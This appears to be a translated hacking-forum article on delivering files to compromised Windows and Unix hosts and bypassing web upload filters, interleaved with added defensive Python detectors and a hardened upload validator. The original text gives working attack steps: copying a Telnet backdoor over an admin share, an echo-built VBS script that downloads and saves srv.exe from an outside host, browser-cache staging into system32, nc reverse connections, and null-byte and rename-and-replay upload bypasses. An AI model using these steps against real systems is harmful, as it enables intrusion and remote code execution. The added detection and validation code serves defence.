File upload vulnerabilities go back a long way. The earliest and most commonly used route was the IPC$ connection followed by a plain copy. Since the Dynamic Network (Dvbbs) upfile vulnerability, all kinds of scripting systems (ASP, PHP, JSP) have had file upload vulnerabilities with a very similar principle: the file upload path is not filtered, so the request can be captured and the space (0x20) changed to 0x00, a null character; the system identifies the name from right to left, so the string is truncated at the null character. More simply, the filtering of upload file types is incomplete, and changing the suffix is enough. All of these upload vulnerabilities are easily handled with a generic upload tool; only the name of the vulnerable file differs.
There are also some alternative file upload methods, for when the system is better protected. Thanks to Cd-lion for providing part of this material.
First copy over a winshell.exe and open a Telnet port; the command line is always easier than the browser.
copy \\myIP\c$\tools\winshell.exe d:\downloads\winzip32 (A file has been copied)
start d:\downloads\winzip32\winshell.exe
The browser window will hang for a long time; there is no need to wait, the program has already started. Click Stop, and then:
Disconnect the shared connection: net use \\myIP\c$ /del. Done.
1. Uploading files using Telnet (by: jiangyf@usa.net)
If FTP is closed and SendMail is not available either, how do you get a compiled file onto the host?
The method is simple:
1. Encode the file to be uploaded with uuencode; the file will look roughly like the following:
Begin 644 File.bat
m.c! J95@T92TP, #503U!=:%=e6#5d9%!>,2q&1d9&1c$l1d9&,2pt4%]j.
M95@T85!9+7@M04%28#!@*CTP, ' 500D]) 04%!049+04] "4$e$34-" 04q%04i-
m3d-"2d%,24%!14u-3d-" 1d5 ' 24=&0t%%3d= ' 1t1 (0t=02$= ' 2da#2$9 1$-!
M1ti (1$-!1t1 ' 4$=.1ti ' 3t= (0t% #3T-/0t] #3T-/0t]!3d%+0t5!07%q<7$@
M "d!%0 ta/($]&1b ' *0t]062 ' E, "Y" 050@+t (@0si<0d%45de2+d-/32 ' o0b ' O
E62 ' *0si<0d%45de2+d-/32 ' *1$5, ($,z7$)!5%9) 4by#3tt@ "@"
`
End
Sum-r/size 17903/262
All of it is visible ASCII characters.
2. Use Telnet to connect to the host and enter
$ cat >a
Then paste the file into the Telnet window with Windows copy/paste.
Press ^D.
This generates the file a in the current directory.
3. uudecode a
The file is recovered; then chmod it.
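From the defender's side, the procedure above leaves a recognisable shape in a shell session transcript: a `cat >` command whose pasted input is a valid uuencode block, followed by `uudecode` on the staging file. The following is an added example (not part of the original post) that parses such a transcript and reports those drops; the session text, the user name and the file names in it are constructed, and the encoded line is produced with the standard library so the sample is a genuine uuencode body.

```python
# Added example, not from the original post: flag a remote-shell session transcript in
# which a file is delivered as uuencoded text pasted into `cat >` and then decoded.
import binascii
import re
from typing import Dict, List, Optional, Tuple

PROMPT = re.compile(r"^\$ (.*)$")                     # a command typed at the shell
CAT_REDIRECT = re.compile(r"^cat\s*>>?\s*(\S+)")        # cat >file / cat >>file
UU_BEGIN = re.compile(r"^begin\s+[0-7]{3,4}\s+(\S+)")   # uuencode header line

# Constructed session (not real data): a one-line script encoded with the standard
# library, pasted after `cat >a`, then decoded with uudecode.
UU_LINE = binascii.b2a_uu(b"#!/bin/sh\n", backtick=True).decode().rstrip("\n")
SAMPLE_SESSION = (
    "$ id\n"
    "uid=1001(www) gid=1001(www)\n"
    "$ cat >a\n"
    "begin 644 hello.sh\n"
    f"{UU_LINE}\n"
    "`\n"
    "end\n"
    "$ uudecode a\n"
    "$ chmod +x hello.sh\n"
)


def split_session(text: str) -> List[Tuple[str, List[str]]]:
    """Group the transcript into (command, following lines) pairs; lines without a
    prompt belong to the preceding command as its pasted input or output."""
    blocks: List[Tuple[str, List[str]]] = []
    for line in text.splitlines():
        m = PROMPT.match(line)
        if m:
            blocks.append((m.group(1).strip(), []))
        elif blocks:
            blocks[-1][1].append(line)
    return blocks


def decode_uu_body(lines: List[str]) -> Optional[bytes]:
    """Decode the lines between a uuencode header and `end`; None if not a valid body.
    Blank lines are skipped because a2b_uu treats an empty line as 32 zero bytes."""
    out = bytearray()
    for line in lines:
        if not line.strip():
            continue
        if line.strip() == "end":
            return bytes(out)
        try:
            out += binascii.a2b_uu(line)
        except binascii.Error:
            return None
    return None  # no terminating 'end'


def find_uuencode_drops(text: str) -> List[Dict]:
    """Report each `cat >` whose pasted input is a valid uuencode block, and whether
    the staging file was decoded later in the same session."""
    findings: List[Dict] = []
    blocks = split_session(text)
    for i, (cmd, fed) in enumerate(blocks):
        m = CAT_REDIRECT.match(cmd)
        if not m:
            continue
        staging = m.group(1)
        header = next((j for j, l in enumerate(fed) if UU_BEGIN.match(l)), None)
        if header is None:
            continue
        payload = decode_uu_body(fed[header + 1:])
        if payload is None:
            continue
        later = [c for c, _ in blocks[i + 1:]]
        decoded = any(re.match(rf"^uudecode\s+{re.escape(staging)}\b", c) for c in later)
        findings.append({
            "staging_file": staging,
            "embedded_name": UU_BEGIN.match(fed[header]).group(1),
            "size": len(payload),
            "payload": payload,
            "decoded_later": decoded,
        })
    return findings


if __name__ == "__main__":
    for hit in find_uuencode_drops(SAMPLE_SESSION):
        print(hit)
```

The decoded payload is returned alongside the finding so the analyst can inspect what was actually dropped, which is often more useful than the staging file name alone.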
3. Scripts are a very good thing: as long as the source code is saved to a file, it can run. So under a shell, use echo statements to write it directly into a file and execute it with the appropriate interpreter. Here is a simplified example of a program:
echo Set xpost = CreateObject("Microsoft.XMLHTTP") >167168.vbs
echo xpost.open "GET", "http://167168.meibu.com/srv.exe", 0 >>167168.vbs
echo xpost.send() >>167168.vbs
echo Set sget = CreateObject("ADODB.Stream") >>167168.vbs
echo sget.mode = 3 >>167168.vbs
echo sget.type = 1 >>167168.vbs
echo sget.open() >>167168.vbs
echo sget.write(xpost.responseBody) >>167168.vbs
echo sget.savetofile "srv.exe", 2 >>167168.vbs
Then execute cscript 167168.vbs. In it, change http://167168.meibu.com/srv.exe to the web path where you put your file; srv.exe can be changed to the path where the file is saved.
4. start http://167168.meibu.com/ca.rar (read carefully; watch out for the forum automatically tagging it)
cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\" (assuming the system is installed on drive C and the current environment is SYSTEM; if it is a user environment, change Default User to that username)
dir /s ca[1].rar
The location of ca[1].rar is then displayed, such as C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\0qmvc11h\ca[1].rar
Finally:
copy 0qmvc11h\ca[1].rar C:\winnt\system32\ca.rar
del 0qmvc11h\ca[1].rar
exe2bat can also be used to convert the file into a batch file and then upload it, but this method is limited to small files: if the file is too long, the paste fails. Transferring nc and doing a reverse connection is a good choice.
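Each of the Windows-side transfer routes above (copying a binary in over an admin share, assembling a script with echo and running it with cscript, retrieving a file from the browser cache into a system directory) leaves a distinctive sequence in command-line audit data. The following is an added example (not part of the original post) that runs three detection rules over such records. The session ids, the host 10.0.0.5, the download host and the ordering of the sample commands are constructed; the rule thresholds are assumptions chosen for illustration.

```python
# Added example, not from the original post: three detection rules run over
# constructed command-line audit records, one per transfer route described above.
import re
from collections import defaultdict
from typing import Dict, List, Tuple

SCRIPT_EXT = r"(?:vbs|js|wsf|bat|cmd|ps1)"
ECHO_REDIRECT = re.compile(r"^\s*echo\b.*?>>?\s*(\S+\." + SCRIPT_EXT + r")\s*$", re.I)
SCRIPT_EXEC = re.compile(
    r"^\s*(?:cscript|wscript|cmd\s+/c|call)?\s*(\S+\." + SCRIPT_EXT + r")\b", re.I)
COPY = re.compile(r'^\s*(?:copy|move|xcopy)\s+("[^"]+"|\S+)\s+("[^"]+"|\S+)', re.I)
CD = re.compile(r"^\s*cd\b", re.I)
ADMIN_SHARE = re.compile(r"\\\\[^\\\s]+\\(?:[a-z]\$|admin\$)\\", re.I)
BROWSER_CACHE = re.compile(r"content\.ie5|temporary internet files", re.I)
SYSTEM_DIR = re.compile(r"\\(?:system32|winnt|windows)\\", re.I)
ECHO_LINES_MIN = 3  # assumed threshold: fewer echo lines is ordinary batch work

# Constructed records (session id, command as typed); not real log data.
SAMPLE_COMMANDS: List[Tuple[str, str]] = [
    ("s1", r"copy \\10.0.0.5\c$\tools\winshell.exe d:\downloads\winzip32"),
    ("s1", r"start d:\downloads\winzip32\winshell.exe"),
    ("s1", r"net use \\10.0.0.5\c$ /del"),
    ("s2", 'echo Set xpost = CreateObject("Microsoft.XMLHTTP") >167168.vbs'),
    ("s2", 'echo xpost.open "GET", "http://download-host.invalid/srv.exe", 0 >>167168.vbs'),
    ("s2", "echo xpost.send() >>167168.vbs"),
    ("s2", 'echo Set sget = CreateObject("ADODB.Stream") >>167168.vbs'),
    ("s2", 'echo sget.savetofile "srv.exe", 2 >>167168.vbs'),
    ("s2", "cscript 167168.vbs"),
    ("s3", r'cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\"'),
    ("s3", r"dir /s ca[1].rar"),
    ("s3", r"copy 0qmvc11h\ca[1].rar C:\winnt\system32\ca.rar"),
    ("s3", r"del 0qmvc11h\ca[1].rar"),
    ("s4", "dir"),
    ("s4", "echo hello >notes.txt"),
]


def analyse_sessions(commands: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (session, rule, command) triples for each rule that fires.

    Rules are evaluated per session, in command order, so a later execution can be
    tied to the echo lines that built the script, and a relative copy can be tied to
    an earlier cd into the browser cache.
    """
    by_session: Dict[str, List[str]] = defaultdict(list)
    for sid, cmd in commands:
        by_session[sid].append(cmd)

    findings: List[Tuple[str, str, str]] = []
    for sid, cmds in by_session.items():
        echo_targets: Dict[str, int] = defaultdict(int)  # script file -> echo lines
        in_browser_cache = False
        for cmd in cmds:
            m = ECHO_REDIRECT.match(cmd)
            if m:
                echo_targets[m.group(1).lower()] += 1
                continue
            # Rule 1: a script written line by line with echo, then executed.
            m = SCRIPT_EXEC.match(cmd)
            if m and echo_targets[m.group(1).lower()] >= ECHO_LINES_MIN:
                findings.append((sid, "script assembled with echo then executed", cmd))
            if CD.match(cmd) and BROWSER_CACHE.search(cmd):
                in_browser_cache = True
            m = COPY.match(cmd)
            if m:
                src, dst = m.group(1), m.group(2)
                # Rule 2: a file pulled in from a remote admin share (c$, admin$).
                if ADMIN_SHARE.search(src):
                    findings.append((sid, "file copied in over an admin share", cmd))
                # Rule 3: something fetched by the browser moved into a system directory.
                if (in_browser_cache or BROWSER_CACHE.search(src)) and SYSTEM_DIR.search(dst):
                    findings.append((sid, "browser cache file moved into a system directory", cmd))
    return findings


if __name__ == "__main__":
    for finding in analyse_sessions(SAMPLE_COMMANDS):
        print(finding)
```

Rule 1 deliberately keys on the execution rather than on the echo lines themselves, since echo-built files are common in legitimate batch work; it is the pairing of several redirected echo lines with a script-host launch of the same file that is unusual.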
Recently I also came across an alumni system where you can upload photos only after registering (session). After registering I found that any file could be uploaded, but only files with an image-type suffix would be resolved. In this situation there should be an extra layer of JSP checking on the server; submitting locally can bypass the JSP, but without logging in, the first level of session validation will not pass. The idea for the upload is to change the ASP file to a jpg suffix and upload it, then capture the packet, which already contains the session value, then modify the suffix to ASP and submit it with NC. That is the principle; the specific testing is in progress.
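The opening paragraph (null-byte truncation of the upload path, incomplete suffix filtering) and the alumni-system case just above (a script renamed to an image suffix, with the session value replayed from a captured request) fail for the same reason: the server trusts the submitted file name and checks nothing else. The following is an added example (not part of the original post) showing that weak suffix-only check beside a server-side acceptance routine that closes those gaps; all inputs are constructed, and the allowed types, the magic-byte table and the naming rule are assumptions for a photo-upload endpoint.

```python
# Added example, not from the original post: a suffix-only upload check beside a
# hardened server-side one. Inputs are constructed; nothing is written to disk.
import hashlib
import os
import re
from typing import Optional

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}

# Leading bytes of the allowed image formats (standard file signatures).
MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}

# Assumed naming rule: the stem may use a safe character set and no further dots,
# so "x.asp.jpg" is refused without relying on the web server's extension mapping.
SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


class UploadRejected(ValueError):
    """Raised by hardened_accept() for any upload that fails validation."""


def weak_is_allowed(filename: str) -> bool:
    """The weak pattern: trust the submitted name and look only at its last suffix.

    "shell.asp\\x00.jpg" still ends in .jpg here (the null byte is passed through
    to whatever writes the path), and a script renamed to .jpg passes because the
    bytes are never inspected.
    """
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXT


def hardened_accept(filename: str, content: bytes, session_user: Optional[str]) -> str:
    """Server-side validation; returns the server-chosen storage name.

    Every check runs on the server for every request, so a captured request
    replayed with a modified name or body meets exactly the same rules.
    """
    if not session_user:
        raise UploadRejected("no authenticated session")
    # Null and other control characters never occur in a legitimate name; a null
    # is the truncation trick (0x20 replaced by 0x00 in the captured request).
    if any(ord(c) < 0x20 for c in filename):
        raise UploadRejected("control character in filename")
    # Discard any client-supplied directory part, whichever separator it used.
    base = os.path.basename(filename.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not SAFE_STEM.fullmatch(stem):
        raise UploadRejected("unsafe or multi-part filename")
    # The bytes must match the declared type; a renamed script does not.
    if not content.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match declared image type")
    # Store under a name the server derives itself; the submitted name never
    # reaches the filesystem, so nothing in it can influence the stored path.
    return hashlib.sha256(content).hexdigest()[:16] + ext


def is_rejected(filename: str, content: bytes, session_user: Optional[str]) -> bool:
    """True if hardened_accept() refuses the upload."""
    try:
        hardened_accept(filename, content, session_user)
    except UploadRejected:
        return True
    return False


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8          # constructed PNG-like header
    print("weak, null byte:", weak_is_allowed("shell.asp\x00.jpg"))
    print("hardened, null byte:", is_rejected("shell.asp\x00.jpg", png, "alice"))
    print("hardened, good photo:", hardened_accept("photo.png", png, "alice"))
```

The content check is the one that defeats the rename-and-replay route: the captured session value gets the request past authentication, but the body is still a script, not an image, and the stored name is never the one the client sent.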